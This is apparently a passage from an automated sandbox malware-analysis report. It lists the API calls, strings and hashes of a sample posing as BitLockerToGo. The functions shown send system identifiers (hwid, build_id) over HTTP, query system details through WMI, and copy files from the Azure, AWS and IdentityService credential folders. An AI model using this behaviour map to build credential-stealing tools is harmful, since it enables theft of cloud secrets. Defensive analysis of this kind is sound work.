                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A04AF5
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 02A04B13
                                                                                                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A04CAB
                                                                                                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A04CEF
                                                                                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A04D1D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,02A37A2B,",build_id,02A3898C,------,02A38980,",hwid,02A3896C,------), ref: 02A05016
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 02A05029
                                                                                                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,?,00000000), ref: 02A05037
                                                                                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02A05094
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 02A0509F
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A050B6
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A050C2
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                                                                                                                                                                                          • String ID: "$"$------$------$------$build_id$hwid
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3006978581-3960666492
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 00c3eb3d54391e412db9ddb6eb95923f552726fc852a14ba1468cb04013ae416
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 75b4fb82706ad39c882bd181aab86d4eb2c632711a5c17ba4c185abb6f8edc9f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00c3eb3d54391e412db9ddb6eb95923f552726fc852a14ba1468cb04013ae416
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43029E31D9512A9ADB21EB21EE45B9DB3B6FF04350F0544E1AA4873164CE75AF8A8FC0
                                                                                                                                                                                                                                                                                                                                                          Function 02A13463 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 02A1346A
                                                                                                                                                                                                                                                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000000), ref: 02A1347B
                                                                                                                                                                                                                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02A1348C
                                                                                                                                                                                                                                                                                                                                                          • CoCreateInstance.COMBASE(02A33F70,00000000,00000001,02A33EA0,?), ref: 02A134A6
                                                                                                                                                                                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02A134DC
                                                                                                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 02A13537
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A133B3: __EH_prolog3_catch.LIBCMT ref: 02A133BA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A133B3: CoCreateInstance.COMBASE(02A34220,00000000,00000001,02A3C17C,?), ref: 02A133DD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A133B3: SysAllocString.OLEAUT32(?), ref: 02A133EA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A133B3: _wtoi64.MSVCRT ref: 02A1341D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A133B3: SysFreeString.OLEAUT32(?), ref: 02A13436
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A133B3: SysFreeString.OLEAUT32(00000000), ref: 02A1343D
                                                                                                                                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 02A13566
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02A13572
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A13579
                                                                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 02A135B8
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A135A5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: String$CreateFreeHeapInitializeInstanceTimeVariant$AllocAllocateBlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2464074849-461178377
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f3394e9f1be9896e29d774a998b80faa63f22e96eb4291783716958f24ee2ae3
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6007b55d31441157840d98c702cb1af6e57be126ccbefe71e533bc1eb7a03f4a
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3394e9f1be9896e29d774a998b80faa63f22e96eb4291783716958f24ee2ae3
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D412871940248BBEB219BD5DC49EEFBBBDFF89B25F10454AF602E6180DA749941CB30
                                                                                                                                                                                                                                                                                                                                                          Function 02A1820C Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A18231
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A13A59
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 02A18250
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,\.azure\), ref: 02A1826D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: wsprintfA.USER32 ref: 02A17D67
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: FindFirstFileA.KERNEL32(?,?), ref: 02A17D7E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: StrCmpCA.SHLWAPI(?,02A37AF4), ref: 02A17D9F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: StrCmpCA.SHLWAPI(?,02A37AF8), ref: 02A17DB9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: wsprintfA.USER32 ref: 02A17DE0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: StrCmpCA.SHLWAPI(?,02A376B6), ref: 02A17DF4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: wsprintfA.USER32 ref: 02A17E11
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: PathMatchSpecA.SHLWAPI(?,?), ref: 02A17E3E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?), ref: 02A17E74
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?,02A37B10), ref: 02A17E86
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?,?), ref: 02A17E99
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?,02A37B14), ref: 02A17EAB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?,?), ref: 02A17EBF
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A182A5
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 02A182C7
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,\.aws\), ref: 02A182E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: wsprintfA.USER32 ref: 02A17E28
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: CopyFileA.KERNEL32(?,?,00000001), ref: 02A17F78
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: DeleteFileA.KERNEL32(?), ref: 02A17FEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: FindNextFileA.KERNEL32(?,?), ref: 02A1804E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: FindClose.KERNEL32(?), ref: 02A18062
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A18319
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 02A1833B
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 02A18358
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A1838D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                                                                                                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 780282842-974132213
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d9ced65d46bc860f2cc0998566ae470265f835c72c993286b25b16e9fd46b9cb
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4bf0db151a2efb9f831261a087c528ec9386751edd6e438980c193a638668b1b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9ced65d46bc860f2cc0998566ae470265f835c72c993286b25b16e9fd46b9cb
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4414271D8021C7AEB19EB60ED47FEDB77DBB04710F444895B706A6190EEB0AE848F51
                                                                                                                                                                                                                                                                                                                                                          Function 02A0BB2E Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A138A6: GetSystemTime.KERNEL32(?,02A37807,?), ref: 02A138D5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0BBD3
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02A0BCDD
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A0BCE4
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A385A4,00000000), ref: 02A0BD95
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A385A8), ref: 02A0BDBD
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A0BDE1
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A385AC), ref: 02A0BDED
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A0BDF7
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A385B0), ref: 02A0BE03
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A0BE0D
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A385B4), ref: 02A0BE19
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A0BE23
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A385B8), ref: 02A0BE2F
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A0BE39
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A385BC), ref: 02A0BE45
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A0BE4F
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A385C0), ref: 02A0BE5B
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A0BE65
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A385C4), ref: 02A0BE71
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02A0BEC3
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A0BEDE
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 02A0BF21
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1956182324-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: adb4d99652180ff5fa2949ce288f6486a1847b311d350e28d4a335bcc9e13e72
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 17a4f35629171945726d48b1a32ef3176be7430c2db2930fac095efe17edb608
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adb4d99652180ff5fa2949ce288f6486a1847b311d350e28d4a335bcc9e13e72
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4C10B36D80118AFDF01ABA0EE8AADE7BB6BF04350B100525FE05B7060DF726E569F50
                                                                                                                                                                                                                                                                                                                                                          Function 02A152CC Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 278stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 02A15317
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,true), ref: 02A153D9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121A5: lstrlen.KERNEL32(?,?,02A19098,02A377FE,02A37787,?,?,?,?,02A19D6E), ref: 02A121AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121A5: lstrcpy.KERNEL32(00000000,00000000), ref: 02A121DD
                                                                                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,?), ref: 02A1549B
                                                                                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 02A154CB
                                                                                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 02A15506
                                                                                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 02A15541
                                                                                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 02A1557C
                                                                                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 02A155B7
                                                                                                                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 02A156CB
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: false$true
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2116072422-2658103896
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 473a633a27ec06942c7a5b461d6f42905d189dd795dbfe0af56ef094f98936de
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ddf549c056087a4a518a6f8b86834151a71022b4204b667b753b88b9a2021b4a
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 473a633a27ec06942c7a5b461d6f42905d189dd795dbfe0af56ef094f98936de
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9B13775D802289FDB64EF24DC88BD973B9BB58320F0005E6E949A7260DF70AEC58F50
                                                                                                                                                                                                                                                                                                                                                          Function 02A08B39 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 177stringCOMMON
